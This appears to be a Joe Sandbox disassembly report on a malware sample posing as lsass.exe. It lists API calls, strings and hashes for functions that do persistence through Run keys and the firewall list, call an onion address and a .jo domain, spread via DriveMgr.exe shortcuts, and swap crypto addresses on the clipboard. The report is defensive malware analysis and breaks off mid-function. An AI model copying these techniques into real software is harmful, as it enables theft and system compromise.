FindWindowA.USER32(3rvr3r3bru3urbu3rbub,00000000), ref: 00781714
InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0078172D
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 00781750
Sleep.KERNEL32(000007D0), ref: 0078175B
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 0078176B
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 00781776
InternetOpenUrlA.WININET(00000000,http://www.48838389493.jo/,00000000,00000000,00000000,00000000), ref: 00781790
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 007817AF
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 007817BA
Sleep.KERNEL32(00001388), ref: 007817C5
MoveFileW.KERNEL32(w4yw4t4tw4twyw4y,e5u5eue5ue5ue5ue5u), ref: 007817D5
MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 007817E5
Sleep.KERNEL32(00000FA0), ref: 007817F0
DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 007817FB
InternetCloseHandle.WININET(00000000), ref: 00781808
Sleep.KERNEL32(00000DAC), ref: 00781813
InternetCloseHandle.WININET(00000000), ref: 00781820
Sleep.KERNEL32(00001388), ref: 0078182B
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 00781848
ShowWindow.USER32(00000000,00000000), ref: 00781857
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 00781862
SetForegroundWindow.USER32(00000000), ref: 0078186F
Sleep.KERNEL32(00000DAC), ref: 0078187A
InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0078188D
InternetOpenUrlA.WININET(00000000,http://www.48838389493.jo/,00000000,00000000,00000000,00000000), ref: 007818BA
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 007818D4
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 007818E4
Sleep.KERNEL32(00000BB8), ref: 007818EF
DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 007818FA
InternetCloseHandle.WININET(00000000), ref: 00781907
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 00781912
Sleep.KERNEL32(00000064), ref: 0078191A
MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 0078192A
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 00781935
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 00781945
DeleteFileA.KERNEL32(3r3hr8h38h8h38f8hff), ref: 00781950
Sleep.KERNEL32(000007D0), ref: 0078195B
InternetCloseHandle.WININET(00000000), ref: 00781968
FindWindowA.USER32(3r3hr8h38h8h38f8hff,00000000), ref: 0078199B
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 007819BA
Sleep.KERNEL32(000007D0), ref: 007819C5
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 007819D0
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 007819E0
Sleep.KERNEL32(00001388), ref: 007819EB
DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 007819F6
Sleep.KERNEL32(00001388), ref: 00781A01
PathFileExistsA.SHLWAPI(3rvr3r3bru3urbu3rbub), ref: 00781A20
DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 00781A2F
Sleep.KERNEL32(00000FA0), ref: 00781A3A
DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 00781A45
Sleep.KERNEL32(000001F4), ref: 00781A50
MoveFileW.KERNEL32(w4yw4t4tw4twyw4y,w4twywyw4yw4yw4yw4y), ref: 00781A60
FindWindowA.USER32(38fh83hf83hf83hf38h,00000000), ref: 00781A6D
Sleep.KERNEL32(00001388), ref: 00781A8B
DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 00781A96
SetForegroundWindow.USER32(00000000), ref: 00781AA3
Sleep.KERNEL32(000001F4), ref: 00781AAE
ShowWindow.USER32(00000000,00000001), ref: 00781ABD
Sleep.KERNEL32(00003A98), ref: 00781AC8
MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,3rvr3r3bru3urbu3rbub), ref: 00781AD8
DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 00781AE3
ShowWindow.USER32(00000000,00000000), ref: 00781AF2
Sleep.KERNEL32(000001F4), ref: 00781AFD
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 00781B08
MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 00781B3F
Sleep.KERNEL32(00001388), ref: 00781B4A
MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 00781B5A
PathFileExistsW.KERNELBASE(w4tw4yw4yw4tw4t), ref: 00781B67
MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 00781BA6
Sleep.KERNEL32(00001388), ref: 00781BB3
FindWindowA.USER32(3r3hr8h38h8h38f8hff,00000000), ref: 00781BC0
DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 00781BDA
SetForegroundWindow.USER32(00000000), ref: 00781BE7
MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 00781BF7
SetFocus.USER32(00000000), ref: 00781C04
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 00781C0F
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 00781C1A
Sleep.KERNEL32(00000BB8), ref: 00781C25
Sleep.KERNEL32(000001F4), ref: 00781C57
MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 00781C67
Sleep.KERNEL32(000003E8), ref: 00781C72
DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 00781C7D
Sleep.KERNELBASE(000001F4), ref: 00781C9E
ExitProcess.KERNEL32 ref: 00781CC0
CreateMutexA.KERNELBASE(00000000,00000000,?), ref: 0078205F
GetLastError.KERNEL32 ref: 0078206B
ExitProcess.KERNEL32 ref: 0078207A
PathFileExistsW.SHLWAPI(w4tw4yw4yw4tw4t), ref: 007820BF
MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 007820D7
Sleep.KERNEL32(00001388), ref: 007820E2
CopyFileA.KERNEL32(f5d4s54s4sds5d5d5d,3r3hr8h38h8h38f8hff,00000000), ref: 007820F4
MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 00782104
MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 0078213B
DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 00782146
Sleep.KERNEL32(000007D0), ref: 00782153
FindWindowA.USER32(3r3hr8h38h8h38f8hff,00000000), ref: 00782160
MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 0078217F
CopyFileA.KERNEL32(f5d4s54s4sds5d5d5d,3r3hr8h38h8h38f8hff,00000000), ref: 00782191
MoveFileW.KERNEL32(w4yw4t4tw4twyw4y,w4twywyw4yw4yw4yw4y), ref: 007821A1
DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 007821AC
MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 007821BC
Sleep.KERNEL32(00002710), ref: 007821C7
CopyFileA.KERNEL32(f5d4s54s4sds5d5d5d,3r3hr8h38h8h38f8hff,00000000), ref: 00782200
MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 00782210
MoveFileW.KERNEL32(w4yw4t4tw4twyw4y,w4twywyw4yw4yw4yw4y), ref: 00782220
FindWindowA.USER32(f5d4s54s4sds5d5d5d,00000000), ref: 0078222F
MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 00782252
Sleep.KERNEL32(00001F40), ref: 0078225D
DeleteFileW.KERNEL32(e5u5eue5ue5ue5ue5u), ref: 00782268
MoveFileA.KERNEL32(3r3hr8h38h8h38f8hff,3rvr3r3bru3urbu3rbub), ref: 00782278
Sleep.KERNEL32(000007D0), ref: 00782283
MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 00782293

Strings

%ls\%d%d%d, xrefs: 0078363F
2, xrefs: 0078242B
3rvr3r3bru3urbu3rbub, xrefs: 0078170F, 00781A1B, 00781ACE, 0078226E, 00782347, 00782376, 00782469, 00782870, 0078289A, 007828D1, 00782A74, 00782C72, 0078305E, 00783317
3r3hr8h38h8h38f8hff, xrefs: 0078167B, 00781702, 0078194B, 00781996, 00781BBB, 007820EA, 0078215B, 00782187, 007821F6, 00782273, 007822B2, 007822BF, 007822D8, 0078237B, 007823A4, 007823DC, 00782457, 0078254D, 007825C8, 007826B1, 0078281D, 00782860, 0078289F, 007828D6, 0078292C, 007829AA, 00782C58, 00782CB7, 00782CD2, 00782E3A, 00782FBE, 00782FEB, 007830DB, 0078314E, 007831A2, 00783209, 00783262, 007832A9, 007832EB, 007834E6
trx, xrefs: 00781D4D
`sx, xrefs: 00781E58
w4yw4t4tw4twyw4y, xrefs: 00781463, 0078154D, 0078160E, 007817D0, 007817F6, 007818F5, 007819F1, 00781A40, 00781A5B, 00781A91, 00781B50, 00781B9C, 00781BED, 00781C5D, 00782175, 0078219C, 00782206, 0078221B, 0078230C, 007824FB, 007827FB, 00782838, 00782853, 0078287F, 007828F0, 0078290B, 00782A0C, 00782A95, 00782AF0, 00782D9D, 00782DA2, 00782DEF, 00782E22, 00782ED2, 00782F83, 00782F99, 00782FCE, 0078304C, 00783106, 0078311C, 0078323F, 0078333C, 00783357, 00783398, 007833B5, 007833CF, 007833E4, 00783444, 0078345A, 0078346A, 007834BC, 00783525, 00783535, 0078358A, 00783595
http://7fv5nq57k4qvbrpt.onion/, xrefs: 00781D3D
38fh83hf83hf83hf38h, xrefs: 00781A68, 00782388, 007828B7, 00782B06, 00782B72, 00783364
6, xrefs: 0078168B
rx, xrefs: 00781DA7
x#, xrefs: 0078209E
%s%s, xrefs: 00783EA8
rx, xrefs: 00781DB1
%ls:Zone.Identifier, xrefs: 00782752
,, xrefs: 00781695
f5d4s54s4sds5d5d5d, xrefs: 007813A2, 0078140A, 0078144B, 007815D9, 007815F4, 00781680, 007817DB, 00781920, 00781A2A, 00781ADE, 00781BD5, 007820CD, 007820EF, 007820FA, 00782131, 00782141, 0078218C, 007821A7, 007821B2, 007821FB, 0078222A, 00782248, 00782289, 007822C4, 00782356, 00782366, 007823A9, 007823B4, 007823E1, 0078245C, 007824DB, 007825CD, 007825ED, 00782644, 0078265E, 007826B6, 007827DD, 0078280B, 00782822, 0078282D, 00782865, 0078288F, 007828AA, 00782931, 00782994, 00782A67, 00782A85, 00782BE9, 00782BF9, 00782CBC, 00782CC7, 00782CD7, 00782D7C, 00782D92, 00782E0A, 00782E3F, 00782F69, 00782FB1, 00782FC3, 00782FF0, 007830E0, 007830F6, 00783153, 00783176, 0078320E, 007832C3, 007832F0, 00783326, 0078338D, 0078344F, 0078348A, 007834CC, 00783500
sx, xrefs: 00781DF7
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00783711
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00783773
B, xrefs: 00783005
http://www.48838389493.jo/, xrefs: 00781560, 00781784, 007818AE, 007822EB, 007824AF, 007825A7, 00782973, 00782ACF, 00782BB2, 00782EE5, 007830B8, 007831E6
lsass.exe, xrefs: 0078278E
w4tw84thw4h8th8w4h8t, xrefs: 0078140F, 007815DE, 007817E0, 00781925, 00781AD3, 007820D2, 007820FF, 00782136, 007821B7, 0078224D, 0078228E, 0078235B, 0078236B, 007823B9, 007824E0, 007824EB, 007825F2, 00782663, 00782810, 00782A8A, 00782BDE, 00782BEE, 00782C29, 00782D5E, 0078317B
e5u5eue5ue5ue5ue5u, xrefs: 007813D6, 00781430, 00781479, 00781494, 007814D0, 0078151C, 007815B3, 007816C1, 007816DC, 00781746, 00781761, 007817A5, 007817CB, 0078183E, 007818DA, 0078193B, 007819B0, 007819D6, 00781B35, 00781B55, 00781BA1, 00781BF2, 00781C62, 0078217A, 0078220B, 00782263, 007823EC, 007824F6, 00782567, 00782800, 0078283D, 00782884, 007828F5, 00782910, 00782A9A, 00782DDF, 00782DF4, 00782E4A, 00782EA1, 00782F4E, 00782FD3, 00783031, 00783051, 007830A0, 00783101, 00783224, 007832CE, 007833D4, 0078345F, 007834C1, 0078359A
lsass.exe, xrefs: 00781CEB
Z, xrefs: 00782421
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 007837D5
%s%s, xrefs: 00783DCB
rx, xrefs: 00781D93
|sx, xrefs: 00781E6A
w4twywyw4yw4yw4yw4y, xrefs: 007814F9, 00781A56, 00782197, 00782216, 007825FD, 00782E89, 00782EBC, 00783352, 007833B0, 007833DF, 00783530
4tx, xrefs: 00781F1B
%ls:*:Enabled:%ls, xrefs: 007836D0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36, xrefs: 007814E8, 00781728, 00781888, 007822A1, 00782482, 00782585, 00782951, 00782AAD, 00782B90, 00782E78, 00783077, 007831C0
w4tw4yw4yw4tw4t, xrefs: 007813CB, 007813DB, 00781425, 00781435, 0078147E, 00781489, 00781499, 007814A4, 007814BA, 007814D5, 00781511, 00781521, 00781537, 007815B8, 007815C3, 0078164B, 00781663, 007816C6, 007816D1, 007816E1, 007816F7, 0078174B, 00781766, 00781771, 007817AA, 007817B5, 00781843, 0078185D, 007818CF, 007818DF, 0078190D, 00781930, 00781940, 007819B5, 007819CB, 007819DB, 00781B03, 00781B3A, 00781B62, 00781C0A, 00781C15, 00781C78, 007820BA, 007823F1, 0078266E, 00782DE4, 00782E4F, 00782E65, 00782EA6, 00782F38, 00782F53, 00783036, 007830A5, 00783229, 007832D3, 00783477
<sx, xrefs: 00781E01
rx, xrefs: 00781D9D
Host Process for Windows Services, xrefs: 00781D2B
X, xrefs: 00782FFB
433u3t, xrefs: 00781CC6
%ls\%ls, xrefs: 00783662
P, xrefs: 00782A3B

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: File$Sleep$Delete$Move$Window$Internet$CloseFind$HandleOpen$ForegroundShow$CopyExistsPath$ExitProcess$CreateErrorFocusLastMutex
String ID: sx$%ls:*:Enabled:%ls$%ls:Zone.Identifier$%ls\%d%d%d$%ls\%ls$%s%s$%s%s$,$2$38fh83hf83hf83hf38h$3r3hr8h38h8h38f8hff$3rvr3r3bru3urbu3rbub$433u3t$4tx$6$<sx$B$Host Process for Windows Services$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36$P$SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$Software\Microsoft\Windows\CurrentVersion\Run\$X$Z$`sx$e5u5eue5ue5ue5ue5u$f5d4s54s4sds5d5d5d$http://7fv5nq57k4qvbrpt.onion/$http://www.48838389493.jo/$lsass.exe$lsass.exe$trx$w4tw4yw4yw4tw4t$w4tw84thw4h8th8w4h8t$w4twywyw4yw4yw4yw4y$w4yw4t4tw4twyw4y$x#$|sx$rx$rx$rx$rx
API String ID: 2034191202-3125172327
Opcode ID: 47e366b57e3c41671d5bb74564adf1941bfe459ca0c3a0dd80013527988474a4
Instruction ID: 4313bd316e56786ed74a7c8f74ae3e8556b7419df2f27b57f7cef0541c38c11d
Opcode Fuzzy Hash: 47e366b57e3c41671d5bb74564adf1941bfe459ca0c3a0dd80013527988474a4
Instruction Fuzzy Hash: AB233CB5AC0618EBD724ABA4DC4EBEC7A74BB48B05F24C184F30AA51D0DBBC5584CF56

Uniqueness

Uniqueness Score: -1.00%

Function 00780240 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0078024E
GetLocaleInfoA.KERNELBASE(00000400,00000007,00000000,0000000A,?,?,?,00000000,?,0000000A), ref: 00780263
strcmp.MSVCRT ref: 00780272

Strings

UKR, xrefs: 00780269

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: InfoLocalememsetstrcmp
String ID: UKR
API String ID: 3255129521-64918367
Opcode ID: 447334b03f819a4eef5cace48aa49fb2926a4f2c2a473d35cc6f9ea9cd58ab2c
Instruction ID: dc85421b0ab6d02721871ab03f0a7a4f5c77470b67cc045793d99122205be1d8
Opcode Fuzzy Hash: 447334b03f819a4eef5cace48aa49fb2926a4f2c2a473d35cc6f9ea9cd58ab2c
Instruction Fuzzy Hash: C2E048B6EC4304B6DA40B6E09C4BF9977687715701F004154BB14961C1F5F9661C87E7

Uniqueness

Uniqueness Score: -1.00%

Function 0078427A Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__set_app_type.MSVCRT ref: 007842A7
__p__fmode.MSVCRT ref: 007842BC
__p__commode.MSVCRT ref: 007842CA
__setusermatherr.MSVCRT ref: 007842F6
_initterm.MSVCRT ref: 0078430C
__getmainargs.MSVCRT ref: 0078432F
_initterm.MSVCRT ref: 0078433F
GetStartupInfoA.KERNEL32(?), ref: 0078437E
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 007843A2
exit.MSVCRT ref: 007843B2
_XcptFilter.MSVCRT ref: 007843C4

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: 2c01569e7a395912aa26291b4da20a2c4fb50c251cd309c1600cead311efec3d
Instruction ID: 5eb043ef8fed0ec6a9e3ad8ddc21209af20f50302c135087458bfb4e2d973259
Opcode Fuzzy Hash: 2c01569e7a395912aa26291b4da20a2c4fb50c251cd309c1600cead311efec3d
Instruction Fuzzy Hash: 9D418BB1CC034AEFDB20AFA4DC89AA97BB8FB09710F30411AF542A7691D7BC4840CB15

Uniqueness

Uniqueness Score: -1.00%

Function 00780290 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 67
networkfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0078029E
InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36,00000000,00000000,00000000,00000000), ref: 007802B3
InternetOpenUrlA.WININET(00000000,http://api.wipmania.com/,00000000,00000000,00000000,00000000), ref: 007802D3
InternetReadFile.WININET(00000000,?,00000063,?), ref: 007802F0

Part of subcall function 00780350: strchr.MSVCRT ref: 0078035B

strcmp.MSVCRT ref: 0078031F
InternetCloseHandle.WININET(00000000), ref: 00780333
InternetCloseHandle.WININET(00000000), ref: 0078033D

Strings

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36, xrefs: 007802AE
http://api.wipmania.com/, xrefs: 007802CA

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: Internet$CloseHandleOpen$FileReadmemsetstrchrstrcmp
String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36$http://api.wipmania.com/
API String ID: 2867819534-3587109876
Opcode ID: 9f417bc266925de7af8b0af0c84b8401009afbb21bb2d22a61f804865d97091d
Instruction ID: 7e89e2bde388e628575cb2a84d385146dac386cd77ef0692364d502b9d7d2234
Opcode Fuzzy Hash: 9f417bc266925de7af8b0af0c84b8401009afbb21bb2d22a61f804865d97091d
Instruction Fuzzy Hash: AF2100B5E84308AFEB20EBB0DC4AF9D7B78AB44701F60451CB605AF1C1D6B96544CF55

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00780B30 Relevance: 87.8, APIs: 31, Strings: 19, Instructions: 291
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfW.USER32 ref: 00780B6F
wsprintfW.USER32 ref: 00780B8F
wsprintfW.USER32 ref: 00780BAF
wsprintfW.USER32 ref: 00780BCF
wsprintfW.USER32 ref: 00780BE8
PathFileExistsW.SHLWAPI(?), ref: 00780BF8
SetFileAttributesW.KERNEL32(?,00000080), ref: 00780C31
DeleteFileW.KERNEL32(?), ref: 00780C3E
PathFileExistsW.SHLWAPI(?), ref: 00780C4B
PathFileExistsW.SHLWAPI(?), ref: 00780C5C
CreateDirectoryW.KERNEL32(?,00000000), ref: 00780C6F
SetFileAttributesW.KERNEL32(?,00000007), ref: 00780C82
PathFileExistsW.SHLWAPI(?), ref: 00780C8F
CopyFileW.KERNEL32(0078A128,?,00000000), ref: 00780CA7
SetFileAttributesW.KERNEL32(?,00000001), ref: 00780CB6
PathFileExistsW.SHLWAPI(?), ref: 00780CC3

Strings

lpx, xrefs: 00780B4E
shell32.dll, xrefs: 00780CD7
%s\%s, xrefs: 00780BC3
shell32.dll, xrefs: 00780CF6
%s.lnk, xrefs: 00780B63
$qx, xrefs: 00780D65
%s\%s, xrefs: 00780BA3
lqx, xrefs: 00780DA1
0qx, xrefs: 00780D6F
%s\%s, xrefs: 00780ED0
%s\%s, xrefs: 00780F43
`qx, xrefs: 00780D97
%s\*, xrefs: 00780BDC
Tqx, xrefs: 00780D8D
<qx, xrefs: 00780D79
xqx, xrefs: 00780DAB
%s\%s\DriveMgr.exe, xrefs: 00780B83
%s\%s\%s, xrefs: 00780F6A
Hqx, xrefs: 00780D83

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: File$ExistsPathwsprintf$Attributes$CopyCreateDeleteDirectory
String ID: $qx$%s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\DriveMgr.exe$%s\*$0qx$<qx$Hqx$Tqx$`qx$lpx$lqx$shell32.dll$shell32.dll$xqx
API String ID: 3616058356-816382982
Opcode ID: 33210e50b8687059884b798df35da6846f88fc8251e0c34126ef035c174a8b58
Instruction ID: a11364174ad4a27f695f6ee2448d3ed917842ac323b1e42ff4553dea05f4b96a
Opcode Fuzzy Hash: 33210e50b8687059884b798df35da6846f88fc8251e0c34126ef035c174a8b58
Instruction Fuzzy Hash: F6C172B198021C9FCB64EF60DC98EEA7778BF44700F5485D8F10AE6141E7789A98CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0077F660 Relevance: 42.5, APIs: 12, Strings: 12, Instructions: 477clipboardstringmemoryCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0077F671
isalpha.MSVCRT ref: 0077F94C
isdigit.MSVCRT ref: 0077F962
strlen.MSVCRT ref: 0077FC14
GlobalAlloc.KERNEL32(00002002,?), ref: 0077FC2B
GlobalLock.KERNEL32(?), ref: 0077FC38
memcpy.MSVCRT ref: 0077FC50
GlobalUnlock.KERNEL32(?), ref: 0077FC5C
OpenClipboard.USER32(00000000), ref: 0077FC64
EmptyClipboard.USER32 ref: 0077FC6E
SetClipboardData.USER32(00000001,?), ref: 0077FC7A
CloseClipboard.USER32 ref: 0077FC80

Strings

bitcoincash:, xrefs: 0077F8D3
0, xrefs: 0077F994
bitcoincash, xrefs: 0077FAF1
bnb, xrefs: 0077FB86
llx, xrefs: 0077FC10, 0077FC13
band, xrefs: 0077FBA2
bitcoincash:, xrefs: 0077F80F
addr, xrefs: 0077FB3B
`lx, xrefs: 0077FBFE, 0077FBEC, 0077FBDA, 0077FB69, 0077FB29, 0077FAF6, 0077FABB, 0077FAA9, 0077FA97, 0077FA3A, 0077FA45, 0077FA28, 0077FA16, 0077F9CE, 0077F9BC, 0077F9AA, 0077FAF9
cosmos, xrefs: 0077FB0D
addr, xrefs: 0077F866
cosmos, xrefs: 0077F83C

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: Clipboard$Global$strlen$AllocCloseDataEmptyLockOpenUnlockisalphaisdigitmemcpy
String ID: 0$`lx$addr$addr$band$bitcoincash$bitcoincash:$bitcoincash:$bnb$cosmos$cosmos$llx
API String ID: 2251388001-3598172751
Opcode ID: fc7f48c0ac2652686ad2f31e39c26b1a19cb7a7ab87950f5e872e2da9ae19478
Instruction ID: 1b20f81c3162a86bb587d8078e6f6277b8cfe1737c59dfe0258fde60b8d1aa2f
Opcode Fuzzy Hash: fc7f48c0ac2652686ad2f31e39c26b1a19cb7a7ab87950f5e872e2da9ae19478
Instruction Fuzzy Hash: 92125EB5A04288ABCF14CF64C6D457E7FB6AF43396F64C0A9D8599F215C7389A80CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0077F010 Relevance: 42.5, APIs: 12, Strings: 12, Instructions: 476clipboardmemorystringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 0077F021
iswalpha.MSVCRT ref: 0077F300
iswdigit.MSVCRT ref: 0077F317
lstrlenW.KERNEL32(0077FD53), ref: 0077F5C9
